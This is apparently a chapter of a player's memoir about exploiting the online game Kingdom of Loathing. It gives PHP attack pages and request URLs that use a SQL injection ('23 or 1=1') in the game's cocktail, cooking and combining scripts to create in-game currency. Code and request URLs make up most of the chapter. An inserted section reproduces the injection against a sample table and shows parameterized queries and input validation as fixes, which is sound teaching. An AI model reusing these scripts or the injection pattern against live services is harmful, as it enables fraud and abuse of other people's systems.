Author: Boozerbear
Chapter Ten
(Cocktailcrafting/Cooking/Combining)
One of the most profitable bugs found in the game (meat per click-wise) was the infamous Salty Dog Hack. It was discovered when Pimonkey and I were discussing some interesting new buggies we'd been playing with and I mentioned that I had found a vulnerability in the Cocktailcrafting script that allowed me to trade meat pastes for salty dogs. The problem with the exploit was that meat pastes took a lot of server hits to make in the quantity we needed, so the exploit was just a moderate-potential meat cheat instead of the "billion meat-per-click" exploit we were searching for. It looked like this:
<?php
print <<<EOF
<html>
<head>
<title>KOL SaltyDog</title>
</head>
<body>
<b>KOL SaltyDog</b>
<form method="get" action="saltydog2.php" target="selah">
how many (this will be x10):
<input type="text" name="amount"><br>
pwd:
<input type="text" name="pwd"><br>
<input type="checkbox" name="repeat">repeat<br>
<input type="submit" name="submit" value="go!">
</form>
<br>
<iframe src="index.php?blank=1" width="620" height="500"
name="selah">
</iframe>
</body>
</html>
EOF;
?>
And then saltydog2.php:
<?php
// Read the form fields by name ($_GET[$amount] in the original looked up an
// undefined key); the checkbox is present in the query string only when ticked.
$amount = (int) $_GET['amount'];
$pwd    = $_GET['pwd'];
$repeat = isset($_GET['repeat']);
$tenamt = $amount * 10;
if ($amount && $pwd) {
    print <<<EOF
<html>
<head>
<title>KOL SaltyDog</title>
EOF;
    if ($repeat) {
        // Auto-refresh every 2 seconds so the page re-runs itself.
        print <<<EOF
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta content="2" http-equiv="REFRESH">
EOF;
    }
    print <<<EOF
</head>
<body>
<b>KOL SaltyDog</b>
<br>
<br>
Making $tenamt Pastes...
EOF;
    // One hidden iframe per batch of ten meat pastes.
    for ($z = 1; $z <= $amount; $z++) {
        print <<<EOF
<iframe src="http://kingdomofloathing.com/inventory.php?which=3&action=10paste"
width="0" height="0" name="adv$z">
</iframe>
<br>
EOF;
    } // end $z
    print <<<EOF
<p>Making all the Salty Dogs we can...
<iframe src="http://kingdomofloathing.com/cocktail.php?action=combine&pwd=$pwd&item1=25 or 1=1&item2=25 or 1=1&makemax=1" width="600" height="100"
name="adv">
</iframe>
</body>
</html>
EOF;
} else {
    print "data missing\n";
}
?>
It was Pimonkey who hit on the bright idea of using Gum on a String instead
of meat pastes, and since they could be bought in any quantity in the Demon Market
for about half the sell price of a Salty Dog, we were now looking at something
that would *double your meat* every time you ran it. Needless to say, we got
extremely excited and both fired up our attack scripts. One minute we were millionaires,
a few minutes later, billionaires. In ten minutes we had stashed away almost
a hundred billion meat and had a few million Salty Dogs left over. The process went
something like this:
buy 16777215 gums: (we hit a limit of 16777215 as the maximum amount of cocktailing
the script would accept, so we only bought that many gums.)
http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215
turn gum into salty dogs:
http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1
sell salty dogs:
http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all
You gain 1090518975 Meat.
stash money in clan:
http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000
This is an SQL injection attack. Basically we're rewriting the MySQL query
to look something like this:
"SELECT cocktailID from cocktail_recipe_table WHERE item1=23 OR 1=1 AND
item2=23 OR 1=1"
instead of:
"SELECT cocktailID from cocktail_recipe_table WHERE item1=23 AND item2=23"
and since 1 always does equal 1, this query always returns success and the function
takes a single Gum On A String in exchange for the Salty Dog. Why a Salty Dog?
Well, I figure since the query didn't actually result in a returned cocktailID,
the script prolly just defaulted to the lowest-numbered mixed drink, the Salty
Dog (#248). Why did it only take 1 Gum On A String? I don't know, but probably
because $item1 and $item2 were the same itemID.
This same vulnerability existed in the cooking and combining scripts as well; can you guess what these scripts gave? (Cooking #162, Combining #31)
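The following is an added example (not code from the original post, and not the game's real server code) that reproduces the query shape the author guesses at above against a constructed in-memory table, then shows the two fixes that close it: binding the item IDs as query parameters, and rejecting any item ID that is not a plain integer before it reaches the query. The table and column names (cocktail_recipe_table, cocktailID, item1, item2) are taken from the author's reconstructed query, item IDs 23 and 248 are the ones named on the page, and the recipe rows themselves are invented for the demo.

```python
import sqlite3

# Constructed sample data, modelled on the column names in the author's guessed
# query. The recipe rows are invented: here cocktail 248 (the Salty Dog) is the
# first row so the injected query's "return the first match" behaviour is visible.
SAMPLE_RECIPES = [
    (248, 100, 101),   # hypothetical: cocktail 248 from items 100 + 101
    (300, 102, 103),   # hypothetical second recipe
]


def build_db():
    """Create an in-memory recipe table populated with SAMPLE_RECIPES."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cocktail_recipe_table "
        "(cocktailID INTEGER, item1 INTEGER, item2 INTEGER)"
    )
    conn.executemany(
        "INSERT INTO cocktail_recipe_table VALUES (?, ?, ?)", SAMPLE_RECIPES
    )
    return conn


def vulnerable_lookup(conn, item1, item2):
    """Build the WHERE clause by string interpolation, as the page describes.

    Whatever arrives in the request becomes part of the SQL text, so the value
    "23 or 1=1" turns the condition into
        item1=23 OR (1=1 AND item2=23) OR 1=1
    which is true for every row; the first row wins.
    """
    sql = (
        "SELECT cocktailID FROM cocktail_recipe_table "
        f"WHERE item1={item1} AND item2={item2}"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def parameterized_lookup(conn, item1, item2):
    """Same query with bound parameters: the SQL text is fixed, and the string
    "23 or 1=1" is compared as a value against an integer column (no match)."""
    sql = (
        "SELECT cocktailID FROM cocktail_recipe_table "
        "WHERE item1=? AND item2=?"
    )
    row = conn.execute(sql, (item1, item2)).fetchone()
    return row[0] if row else None


def parse_item_id(raw):
    """Input validation for a request field: accept only a plain positive integer.

    Anything else, including the page's "23 or 1=1", is rejected before any
    query is built.
    """
    if not raw.isdigit():
        raise ValueError(f"item id is not an integer: {raw!r}")
    return int(raw)


def demo():
    conn = build_db()
    payload = "23 or 1=1"
    results = {
        "vulnerable_injected": vulnerable_lookup(conn, payload, payload),   # 248
        "vulnerable_honest": vulnerable_lookup(conn, 23, 23),                # None
        "parameterized_injected": parameterized_lookup(conn, payload, payload),  # None
        "parameterized_real_recipe": parameterized_lookup(conn, 100, 101),  # 248
    }
    try:
        parse_item_id(payload)
        results["validation_rejects_payload"] = False
    except ValueError:
        results["validation_rejects_payload"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Either fix on its own closes the hole the author describes; together they also give a cheap detection signal, since a rejected item ID is exactly the kind of request that never occurs in normal play and is worth logging.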
Since I was essentially racing against Pi and we were both racing against Jick (we'd both sent him a bug report), I didn't bother to script the process completely. I think both of us were just manually dumping meat into the clan stash after running the script. The whole thing lasted less than an hour before Jick came on and closed the hole.
<?php
print <<<EOF
<html>
<head>
<title>KOL Salty Dogger</title>
</head>
<body>
<b>KOL Salty Dogger</b>
<br>
<br>
sell salty dogs:
<br>
<iframe src="http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all"
width="600" height="170" name="adv3">
</iframe>
http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all
<br>
<br>
<!--
stash money in clan:
<br>
<iframe src="http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000"
width="600" height="170" name="adv4">
</iframe>
http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000
-->
buy 16777215 gums:
<br>
<iframe src="http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215"
width="600" height="170" name="adv1">
</iframe>
http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215
<br>
<br>
turn gum into salty dogs:
<br>
<iframe src="http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1" width="600" height="170"
name="adv2">
</iframe>
http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1
<br>
<br>
stash 550000000 in closet:
<br>
</body>
</html>
EOF;
?>